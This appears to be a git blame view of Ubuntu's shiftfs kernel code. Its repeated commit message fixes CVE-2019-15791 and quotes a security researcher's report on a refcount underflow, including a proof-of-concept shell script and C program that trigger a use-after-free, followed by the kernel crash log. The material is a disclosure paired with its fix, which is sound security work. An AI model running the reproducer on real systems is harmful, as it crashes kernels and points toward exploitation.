dropped on fdput() in error paths. Do not maintain the struct fd
in the caller, as it the fd installed in the fd table is
sufficient to properly clean up. Finally, remove the fdput() in
shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
__close_fd() call.
Original report from Jann Horn:
In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
src = fdget(oldfd);
if (!src.file)
return -EINVAL;
// src holds one reference (assuming multithreaded execution)
ret = shiftfs_real_fdget(src.file, lfd);
// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
// extra references
fdput(src);
// this drops the only reference we were holding on src, and src was
// the only thing holding a reference to lfd->file. lfd->file may be
// dangling at this point.
if (ret)
return ret;
*newfd = get_unused_fd_flags(lfd->file->f_flags);
if (*newfd < 0) {
// always a no-op
fdput(*lfd);
return *newfd;
}
fd_install(*newfd, lfd->file);
// fd_install() consumes a counted reference, but we don't hold any
// counted references. so at this point, if lfd->file hasn't been freed
// yet, its refcount is one lower than it ought to be.
[...]
// the following code is refcount-neutral, so the refcount stays one too
// low.
if (ret)
shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
shiftfs_real_fdget() is implemented as follows:
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;
lowerfd->flags = 0;
lowerfd->file = realfile;
/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);
return 0;
}
Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:
=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
set -e
mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
int main(void) {
int root = open("mnt/shiftfs", O_RDONLY);
if (root == -1) err(1, "open shiftfs root");
int foofd = openat(root, "foo", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
struct btrfs_ioctl_vol_args iocarg = {
.fd = foofd
};
ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
sleep(1);
void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 183.463452] general protection fault: 0000 [#1] SMP PTI
[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 183.510580] Call Trace:
[ 183.511396] mmap_region+0x417/0x670
[ 183.512592] do_mmap+0x3a8/0x580
[ 183.513655] vm_mmap_pgoff+0xcb/0x120
[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
[ 183.516155] __x64_sys_mmap+0x33/0x40
[ 183.517352] do_syscall_64+0x5a/0x130
[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[ 183.560350] ---[ end trace 4a860910803657c2 ]---
[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================
Disassembly of surrounding code:
55 push rbp
4889E5 mov rbp,rsp
4157 push r15
4156 push r14
4155 push r13
4154 push r12
488B87C8000000 mov rax,[rdi+0xc8]
4C8B6810 mov r13,[rax+0x10]
498B4528 mov rax,[r13+0x28]
4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000 jz near 0xcc
4989FC mov r12,rdi
4989F6 mov r14,rsi
This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of "realfile->f_op->mmap" in the source code.
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15791
Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
2019-11-01 15:41:03 +00:00
|
|
|
shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
|
2021-04-09 18:10:37 +00:00
|
|
|
ret = -EFAULT;
|
2021-04-09 18:01:06 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
return ret;
|
|
|
|
|
|
|
|
err_free:
|
|
|
|
kfree(v1);
|
|
|
|
kfree(v2);
|
2019-04-04 13:39:13 +00:00
|
|
|
|
|
|
|
return ret;
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
|
|
|
|
unsigned long arg)
|
|
|
|
{
|
|
|
|
struct fd lowerfd;
|
|
|
|
struct cred *newcred;
|
|
|
|
const struct cred *oldcred;
|
2019-04-04 13:39:13 +00:00
|
|
|
int newfd = -EBADF;
|
|
|
|
long err = 0, ret = 0;
|
|
|
|
void __user *argp = (void __user *)arg;
|
2019-04-04 13:39:12 +00:00
|
|
|
struct super_block *sb = file->f_path.dentry->d_sb;
|
2019-04-04 13:39:13 +00:00
|
|
|
struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
|
|
|
|
struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
|
|
|
|
|
|
|
|
ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
|
UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling
BugLink: https://bugs.launchpad.net/bugs/1850867
shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
file from the lower filesystem without taking an additional
reference to that file. After the btrfs ioctl completes this fd
is closed, which then puts a reference to that file, leading to a
refcount underflow. Original bug report and test case from Jann
Horn is below.
Fix this, and at the sametime simplify the management of the fd
to the lower file for the ioctl. In
shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
the lower file and set FDPUT_FPUT so that this reference will get
dropped on fdput() in error paths. Do not maintain the struct fd
in the caller, as it the fd installed in the fd table is
sufficient to properly clean up. Finally, remove the fdput() in
shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
__close_fd() call.
Original report from Jann Horn:
In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
src = fdget(oldfd);
if (!src.file)
return -EINVAL;
// src holds one reference (assuming multithreaded execution)
ret = shiftfs_real_fdget(src.file, lfd);
// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
// extra references
fdput(src);
// this drops the only reference we were holding on src, and src was
// the only thing holding a reference to lfd->file. lfd->file may be
// dangling at this point.
if (ret)
return ret;
*newfd = get_unused_fd_flags(lfd->file->f_flags);
if (*newfd < 0) {
// always a no-op
fdput(*lfd);
return *newfd;
}
fd_install(*newfd, lfd->file);
// fd_install() consumes a counted reference, but we don't hold any
// counted references. so at this point, if lfd->file hasn't been freed
// yet, its refcount is one lower than it ought to be.
[...]
// the following code is refcount-neutral, so the refcount stays one too
// low.
if (ret)
shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
shiftfs_real_fdget() is implemented as follows:
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;
lowerfd->flags = 0;
lowerfd->file = realfile;
/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);
return 0;
}
Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:
=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
set -e
mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
int main(void) {
int root = open("mnt/shiftfs", O_RDONLY);
if (root == -1) err(1, "open shiftfs root");
int foofd = openat(root, "foo", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
struct btrfs_ioctl_vol_args iocarg = {
.fd = foofd
};
ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
sleep(1);
void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 183.463452] general protection fault: 0000 [#1] SMP PTI
[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 183.510580] Call Trace:
[ 183.511396] mmap_region+0x417/0x670
[ 183.512592] do_mmap+0x3a8/0x580
[ 183.513655] vm_mmap_pgoff+0xcb/0x120
[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
[ 183.516155] __x64_sys_mmap+0x33/0x40
[ 183.517352] do_syscall_64+0x5a/0x130
[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[ 183.560350] ---[ end trace 4a860910803657c2 ]---
[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================
Disassembly of surrounding code:
55 push rbp
4889E5 mov rbp,rsp
4157 push r15
4156 push r14
4155 push r13
4154 push r12
488B87C8000000 mov rax,[rdi+0xc8]
4C8B6810 mov r13,[rax+0x10]
498B4528 mov rax,[r13+0x28]
4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000 jz near 0xcc
4989FC mov r12,rdi
4989F6 mov r14,rsi
This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of "realfile->f_op->mmap" in the source code.
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15791
Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
2019-11-01 15:41:03 +00:00
|
|
|
&newfd);
|
2019-04-04 13:39:13 +00:00
|
|
|
if (ret < 0)
|
|
|
|
return ret;
|
2019-04-04 13:39:12 +00:00
|
|
|
|
|
|
|
ret = shiftfs_real_fdget(file, &lowerfd);
|
|
|
|
if (ret)
|
2019-04-04 13:39:13 +00:00
|
|
|
goto out_restore;
|
2019-04-04 13:39:12 +00:00
|
|
|
|
2020-05-20 11:44:27 +00:00
|
|
|
ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred);
|
2019-04-04 13:39:12 +00:00
|
|
|
if (ret)
|
|
|
|
goto out_fdput;
|
|
|
|
|
|
|
|
ret = vfs_ioctl(lowerfd.file, cmd, arg);
|
|
|
|
|
|
|
|
shiftfs_revert_ioctl_creds(oldcred, newcred);
|
|
|
|
|
|
|
|
shiftfs_copyattr(file_inode(lowerfd.file), file_inode(file));
|
|
|
|
shiftfs_copyflags(file_inode(lowerfd.file), file_inode(file));
|
|
|
|
|
|
|
|
out_fdput:
|
|
|
|
fdput(lowerfd);
|
|
|
|
|
2019-04-04 13:39:13 +00:00
|
|
|
out_restore:
|
UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling
BugLink: https://bugs.launchpad.net/bugs/1850867
shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
file from the lower filesystem without taking an additional
reference to that file. After the btrfs ioctl completes this fd
is closed, which then puts a reference to that file, leading to a
refcount underflow. Original bug report and test case from Jann
Horn is below.
Fix this, and at the sametime simplify the management of the fd
to the lower file for the ioctl. In
shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
the lower file and set FDPUT_FPUT so that this reference will get
dropped on fdput() in error paths. Do not maintain the struct fd
in the caller, as it the fd installed in the fd table is
sufficient to properly clean up. Finally, remove the fdput() in
shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
__close_fd() call.
Original report from Jann Horn:
In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
src = fdget(oldfd);
if (!src.file)
return -EINVAL;
// src holds one reference (assuming multithreaded execution)
ret = shiftfs_real_fdget(src.file, lfd);
// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
// extra references
fdput(src);
// this drops the only reference we were holding on src, and src was
// the only thing holding a reference to lfd->file. lfd->file may be
// dangling at this point.
if (ret)
return ret;
*newfd = get_unused_fd_flags(lfd->file->f_flags);
if (*newfd < 0) {
// always a no-op
fdput(*lfd);
return *newfd;
}
fd_install(*newfd, lfd->file);
// fd_install() consumes a counted reference, but we don't hold any
// counted references. so at this point, if lfd->file hasn't been freed
// yet, its refcount is one lower than it ought to be.
[...]
// the following code is refcount-neutral, so the refcount stays one too
// low.
if (ret)
shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
shiftfs_real_fdget() is implemented as follows:
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;
lowerfd->flags = 0;
lowerfd->file = realfile;
/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);
return 0;
}
Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:
=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
set -e
mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
int main(void) {
int root = open("mnt/shiftfs", O_RDONLY);
if (root == -1) err(1, "open shiftfs root");
int foofd = openat(root, "foo", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
struct btrfs_ioctl_vol_args iocarg = {
.fd = foofd
};
ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
sleep(1);
void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 183.463452] general protection fault: 0000 [#1] SMP PTI
[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 183.510580] Call Trace:
[ 183.511396] mmap_region+0x417/0x670
[ 183.512592] do_mmap+0x3a8/0x580
[ 183.513655] vm_mmap_pgoff+0xcb/0x120
[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
[ 183.516155] __x64_sys_mmap+0x33/0x40
[ 183.517352] do_syscall_64+0x5a/0x130
[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[ 183.560350] ---[ end trace 4a860910803657c2 ]---
[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
